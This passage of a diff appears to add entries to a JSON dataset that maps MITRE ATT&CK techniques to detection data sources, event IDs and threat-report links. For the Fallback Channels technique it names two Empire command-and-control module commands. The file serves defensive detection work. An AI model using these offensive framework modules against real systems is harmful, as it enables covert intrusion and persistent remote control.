This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in 
order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", 
+ "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + "https://www.fireeye.com/current-threats/threat-intelligence-reports/rpt-fin4.html", + "https://www2.fireeye.com/WBNR-14Q4NAMFIN4.html", + "https://www.justice.gov/file/1080281/download", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + 
"https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1008", + "command_list": [ + "powershell/management/switch_listener", + "external/generate_agent" + ], + "commands": [ + { + "command": "powershell/management/switch_listener", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "external/generate_agent", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Empire Module": "powershell/management/switch_listener", + "ATT&CK Technique #1": "T1008", + "ATT&CK Technique #2": "", + "Technique": "Fallback Channels", + "Concatenate for Python Dictionary": "\"powershell/management/switch_listener\": [\"T1008\"]," + }, + { + "Empire Module": "external/generate_agent", + "ATT&CK Technique #1": "T1008", + "ATT&CK Technique #2": "", + "Technique": "Fallback Channels", + "Concatenate for Python Dictionary": "\"external/generate_agent\": [\"T1008\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Malware reverse engineering" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Packet capture" + ], + [ + "4688", + "Process Execution" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "Malware reverse engineering" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "Packet capture" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
